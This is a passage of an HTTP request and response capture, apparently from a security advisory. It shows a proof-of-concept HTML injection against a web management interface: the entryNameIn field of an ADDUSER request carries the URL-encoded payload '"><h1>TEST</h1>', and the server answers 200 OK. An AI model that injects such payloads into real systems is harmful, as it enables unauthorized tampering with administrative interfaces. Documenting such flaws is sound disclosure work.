Content-Length: 102
DNT: 1
Connection: close
Cookie: risessionid=071652497206133; cookieOnOffChecker=on; wimsesid=98044857
mode=ADDUSER&step=BASE&wimToken=958429369&entryIndexIn=00001&entryNameIn=%22%3E%3Ch1%3ETEST%3C%2Fh1%3E
# HTTP Response :
HTTP/1.1 200 OK
Date: Mon, 06 May 2019 11:42:46 GMT
Server: Web-Server/3.0
Content-Type: text/plain
Expires: Mon, 06 May 2019 11:42:46 GMT
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close
[14]